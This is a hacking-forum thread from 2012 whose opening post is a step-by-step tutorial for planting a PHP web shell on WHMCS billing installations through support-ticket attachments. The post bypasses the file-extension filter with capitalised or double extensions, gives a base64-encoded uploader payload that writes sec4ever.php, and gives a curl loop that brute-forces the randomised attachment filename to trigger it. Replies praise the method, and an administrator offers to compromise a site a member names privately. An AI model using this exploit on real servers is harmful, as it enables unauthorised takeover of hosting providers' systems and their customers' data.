Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


WHMCS 3rd TricK wIth MiMe TyPe And PHP Ext ByPass

  • 4 Vote(s) - 4 Average


09-30-2012, 11:15 PM #1
b0x Offline b0x *******
Administrators
Posts:78 Threads:34 Joined:Jul 2012 Reputation: 4
Mood: None
Hello Brothers Heart

How are You ?

Today We've 3rd WHMCS Trick Smiley1 - Uploading Shell On WHMCS Via Attachments

At First , Let's Talk About Mime Types

These Are Extensions

Code:
gif,png,rar,zip,php,asp,aspx

Apache Uses Extension To Run File As It Extension

For Example If You Upload File As This : b0x.gif

Apache Will run it As Picture/Image

And If You Do it As This : b0x.php

The File will Be Run as PHP File Smiley1

Okay ... In Apache There Are Many Extensions Are Not Defined-ed Like rar

So Let's Start in WHMCS go to submit new ticket

Code:
http://site.tld/whmcs/submitticket.php

You'll See This

[Image: WOR61514.png]
So Here The Attachments We've Prospect'z

I : The Extension PHP Is allowed To Be Uploaded Smiley1

But When We Try 2 Upload PHP File We'll Have This result

[Image: AKQ64896.png]

To Bypass This Problem ,, Just You've To Change Extension From Small php To Capital PHP Like This

Code:
b0x.PHP

The Changing In Extension Will Be Via Tamepr Data

[Image: oDZ62191.png]

Then Submit it

[Image: wh162273.png]

Our Ticket Is ready Now .. So We Uploaded PHP

This Was Our 1st Prospect

II : PHP Extension Is not Allowed To Be uploaded on WHMCS

So We'll Use Non-Defined Extension in Apache

Like " rar " So We'll Use Tamper Data Too

[Image: tSi62460.png]

We'll Upload As This "b0x.PHP.rar"

Don't Forget Capital Letters

Then We'll Have This

[Image: hlj62514.png]

File Uploaded Successfully Biggrinsmiley

But In WHMCS ,, When You Use Attachment or upload One

The File Will Automatically Renamed To Be Like This

Code:
number_filename.extension

For Example Our File b0x.PHP Will Be Like This

Code:
RandomNumber_b0x.PHP

We'll Not be Able To Know The Numbers Because it Uses Random Number So We've To Try Numbers

Before That .. Let's Make Small Summery

This Code Must be As Attach File

PHP Code:
<?php 
$shellcode 
"PD9waHANCmVjaG8gJzxiPjxicj48YnI+Jy5waHBfdW5hbWUoKS4nPGJyPjwvYj4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBTVUtTRVMgISEhPC9iPjxicj48YnI+JzsgfQ0KCWVsc2UgeyBlY2hvICc8Yj5VcGxvYWQgR0FHQUwgISEhPC9iPjxicj48YnI+JzsgfQ0KfQ0KPz4="
$b0x fopen("sec4ever.php","w"); 
fwrite($b0x,base64_decode($shellcode)); 
?>

This is uploader Script Will be Opened In The Same Folde - attachments -
Now Upload it as Before Via .PHP or non-defined

After That ,, Use This Code To Generate / Browse Site And get Uploader in sec4ever.php

PHP Code:
<?  
error_reporting
(0);  
$url "http://domain.tld/whmcs/";  
$attachfolder "attachments";  
$attach"b0x.PHP";  
for(
$b0x=100000$b0x<1000000;$b0x++){  
$urls "$url/$attachfolder/$b0x"$urls.="_$attach";  
$ch = @curl_init();  
@
curl_setopt($chCURLOPT_RETURNTRANSFER1);  
@
curl_setopt($chCURLOPT_URL$urls );  
$result = @curl_exec($ch);  
@
curl_close($ch);  
}  
?>

Edit The Variables To Get The Correct Result - 3xPecteD

Then When The Script Ends Browsing URL'z Via Auto-Generate By For Function

The Script Will Browse Your PHP Code But You'll No Be Able To Know What is the Number !

But The Script Will Generate Shell/Uploader in Sec4ever.php

[Image: q8O63187.png]

Greet'z
I-Hmx
Sec4ever
MadLeets
Shadow008
1337
H4x0rL1f3
Dr.Zombie
KhantastiC
X-Shadow




Thanks 4 All
./b0x






09-30-2012, 11:19 PM #2
H4x0rl1f3 Offline Commander In Cheif *******
Administrators
Posts:1,129 Threads:25 Joined:Jun 2012 Reputation: 15
Mood: Stoned
Finally its out wink
hahahah UnderTaker u rock wink

Always Aspect Reward from the Creator and not anyone or anything Created.
For Complaints & Help Contact:- [email protected]
Zone-h
http://zone-h.org/archive/notifier=H4x0rL1f3
I am the orphan of Gaza & Kashmir. Ruins of Iraq,Syria & Palestine Bombarded of Pakistan,Afghanistan, Mali & Yemen Change of Libya and Egypt Discriminated of Bahrain & Turkey Freedom of Earth's paradise and Al-AQSA. I am the hunger stricken child of Somalia, Ethopia, & rest of Africa I am the suffering of each and every single corner of the world. But Listen!!! Hope is what I am!!


09-30-2012, 11:19 PM #3
3thicaln00b Offline MadLeets Vip ******
V.I.P
Posts:33 Threads:2 Joined:Sep 2012 Reputation: 0
Mood: None
awesome trick buddy Smiley1

09-30-2012, 11:21 PM #4
CutY Offline MadLeets Vip ******
V.I.P
Posts:174 Threads:32 Joined:Jun 2012 Reputation: 1
Mood: None
wut an idea sir G =)))

RocKxx xD

09-30-2012, 11:52 PM #5
Pain006 Offline Super Moderator ******
Super Moderators
Posts:575 Threads:28 Joined:Jun 2012 Reputation: 0
Mood: None
Great Biggrinsmiley Smiley1

10-01-2012, 12:43 AM #6
Dr.Z0mbie Offline Administrator *******
Administrators
Posts:286 Threads:27 Joined:Jun 2012 Reputation: 6
Mood: None
awesome trick, keep up the good work Smiley1

Y U NO ADD REP?!

10-01-2012, 12:56 AM #7
b13-u Offline Junior Member **
Registered
Posts:5 Threads:0 Joined:Sep 2012 Reputation: 0
Mood: None
Not Working ...
u cant upload file like this
up.PHP
RandNumber_up.PHP
it is not allowed in whmcs u have to upload like this
up.PHP.gif
RandNumber_up.PHP.gif
the php file will not excute...

10-01-2012, 01:10 AM #8
H4x0rl1f3 Offline Commander In Cheif *******
Administrators
Posts:1,129 Threads:25 Joined:Jun 2012 Reputation: 15
Mood: Stoned
(10-01-2012, 12:56 AM)b13-u Wrote:  Not Working ...
u cant upload file like this
up.PHP
RandNumber_up.PHP
it is not allowed in whmcs u have to upload like this
up.PHP.gif
RandNumber_up.PHP.gif
the php file will not excute...
lols, if this was not working we wouldnt have posted, not everything here u see is visible to 1,2,3,4,5,6 steps even all his easy you are just unable to do it.
This works 100 percent and we did it also.
Regard's

Always Aspect Reward from the Creator and not anyone or anything Created.
For Complaints & Help Contact:- [email protected]
Zone-h
http://zone-h.org/archive/notifier=H4x0rL1f3
I am the orphan of Gaza & Kashmir. Ruins of Iraq,Syria & Palestine Bombarded of Pakistan,Afghanistan, Mali & Yemen Change of Libya and Egypt Discriminated of Bahrain & Turkey Freedom of Earth's paradise and Al-AQSA. I am the hunger stricken child of Somalia, Ethopia, & rest of Africa I am the suffering of each and every single corner of the world. But Listen!!! Hope is what I am!!


10-01-2012, 01:15 AM #9
b0x Offline b0x *******
Administrators
Posts:78 Threads:34 Joined:Jul 2012 Reputation: 4
Mood: None
hey mad'z

thx 4 posting
Code:
lols, if this was not working we wouldnt have posted, not everything  here u see is visible to 1,2,3,4,5,6 steps even all his easy you are  just unable to do it.
This works 100 percent and we did it also.
Regard's

We'll Kill him =)))

Mr b13-u

Send Me in Priv8 Message Site To upload Shell Smiley1
And Check the Version ,, We Executed on the Last one Biggrinsmiley 5.1

10-01-2012, 04:10 AM #10
b13-u Offline Junior Member **
Registered
Posts:5 Threads:0 Joined:Sep 2012 Reputation: 0
Mood: None
how do u expect this
fwrite($b0x,base64_decode($shellcode));
to work while server is not handling it as php ?
anyway i sent u the target i alo tryed on many others

thankx






Forum Jump:


Users browsing this thread:1 Guest(s)